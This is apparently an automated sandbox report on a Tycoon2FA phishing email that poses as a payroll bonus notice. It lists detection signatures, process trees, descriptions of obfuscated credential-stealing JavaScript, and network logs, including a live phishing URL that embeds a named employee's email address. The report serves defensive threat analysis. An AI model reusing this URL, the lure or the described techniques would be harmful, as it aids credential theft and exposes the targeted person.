Edit tour

Windows Analysis Report
f64da42c-e9a8-a0ac-437d-d14377da4643.eml

Overview

General Information

Sample name:f64da42c-e9a8-a0ac-437d-d14377da4643.eml
Analysis ID:1640423
MD5:72d477110463da85c47b6a3d7a6bcb5f
SHA1:b406c919997c8ce218ce73c6c03728445924ef64
SHA256:42c140d453c2715598c974b451b051b8299f57b9889331251399723408a95c68
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:92
Range:0 - 100
Confidence:100%

Signatures

Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
AI detected suspicious elements in Email content
AI detected suspicious elements in Email header
Creates files inside the system directory
Deletes files inside the Windows folder
HTML page contains hidden javascript code
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores large binary data to the registry

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6960 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\f64da42c-e9a8-a0ac-437d-d14377da4643.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 7088 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "5CFEB4FB-04F4-4B2F-9E7F-337451882B82" "1ED012E8-2066-482D-AEE7-618C4311BFF8" "6960" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • Acrobat.exe (PID: 6624 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\NHW451JN\Terry.tuttle - Payroll Salary Bonus Distribution.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 1716 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 4268 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1552,i,12906053778144983868,4860552742854618519,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 2896 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yodel.co.uk MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 3492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,4043445577535756806,6777882503626172561,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1564 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_157JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    dropped/chromecache_157JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
      SourceRuleDescriptionAuthorStrings
      0.6..script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
        0.1.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
          0.0.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
            0.1.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
              0.0.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
                Click to see the 6 entries
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6960, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                Phishing

                barindex
                Source: Yara matchFile source: dropped/chromecache_157, type: DROPPED
                Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 0.6..script.csv, type: HTML
                Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: 0.1.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts, and implementing a suspicious redirection mechanism. The combination of these behaviors suggests that this script is likely malicious and intended to interfere with the user's normal browsing experience.
                Source: 0.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yo... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending data to an untrusted domain, which further increases the risk. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
                Source: 0.6..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yo... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script that is attempting to collect sensitive user data and execute remote code. The script also includes a suspicious form submission to an unknown domain, further indicating malicious intent. Overall, this script poses a significant security risk and should be treated with caution.
                Source: 0.0.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behaviors, including dynamic code execution through the use of `eval()` and obfuscated code. The script appears to be attempting to execute remote or malicious code, which poses a significant security risk. This should be considered a high-risk script that requires immediate investigation and remediation.
                Source: EmailJoe Sandbox AI: Detected potential phishing email: Suspicious sender domain 'garde-intl.com' doesn't match the claimed company Yodel Co.. Generic payroll subject line with unnecessary reference ID appears designed to create urgency. No-reply sender address for sensitive payroll communication is unusual and suspicious
                Source: EmailJoe Sandbox AI: Detected suspicious elements in Email header: Mismatched PTR records: Header shows 'ybxxqa55.secure.ne.jp' but received from '52597.ip-ptr.tech'. Suspicious received header format with 'unknown' HELO and unusual IP pattern. Multiple IP addresses appearing in headers (27.34.154.55 and 147.45.49.87) indicating potential spoofing. Unusual email authentication pattern with 'Anonymous' cross-tenant authentication. Despite low BCL and SCL scores, the combination of routing anomalies and authentication inconsistencies suggests potential malicious intent. The return-path matches the sender but routing patterns are suspicious. Japanese origin (CTRY:JP) but using English (LANG:en) with suspicious routing through multiple IPs
                Source: https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yodel.co.ukHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Office 365 Documentation</title> <style> body { font-family: Arial, sans-serif...
                Source: EmailClassification: Payroll Fraud
                Source: unknownHTTPS traffic detected: 172.67.151.76:443 -> 192.168.2.16:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.16:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.16:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.196:443 -> 192.168.2.16:49728 version: TLS 1.2
                Source: chrome.exeMemory has grown: Private usage: 1MB later: 36MB
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.227
                Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.227
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /btb1KhWg/$terry.tuttle@yodel.co.uk HTTP/1.1Host: gs.nthecatepi.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gs.nthecatepi.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gs.nthecatepi.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gs.nthecatepi.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gs.nthecatepi.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://gs.nthecatepi.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=rU7ik.yBZ0CGRS_GapLIGtLhBad7BYw6EFHJqvSWbiU-1742202807-1.0.1.1-YoVi14pMLPV_9GBfji0g04nrbwZNnJj4Mn.neIRHFi1bgynGU.pnA920.IUwsBZ8wiIMCz74jgYjql2U.NZksKxdKJHl5s8kh3PybeBoK5o
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: x1.i.lencr.org
                Source: global trafficDNS traffic detected: DNS query: gs.nthecatepi.ru
                Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownHTTPS traffic detected: 172.67.151.76:443 -> 192.168.2.16:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.16:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.16:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.196:443 -> 192.168.2.16:49728 version: TLS 1.2
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir2896_1926784170
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir2896_1926784170
                Source: classification engineClassification label: mal92.phis.evad.winEML@39/25@18/199
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250317T0513010965-6960.etl
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\f64da42c-e9a8-a0ac-437d-d14377da4643.eml"
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "5CFEB4FB-04F4-4B2F-9E7F-337451882B82" "1ED012E8-2066-482D-AEE7-618C4311BFF8" "6960" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\NHW451JN\Terry.tuttle - Payroll Salary Bonus Distribution.pdf"
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "5CFEB4FB-04F4-4B2F-9E7F-337451882B82" "1ED012E8-2066-482D-AEE7-618C4311BFF8" "6960" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1552,i,12906053778144983868,4860552742854618519,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yodel.co.uk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,4043445577535756806,6777882503626172561,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1564 /prefetch:3
                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 297DA30BCB4995D43FBFB6E639081595
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\NHW451JN\Terry.tuttle - Payroll Salary Bonus Distribution.pdf"
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1552,i,12906053778144983868,4860552742854618519,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,4043445577535756806,6777882503626172561,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1564 /prefetch:3
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
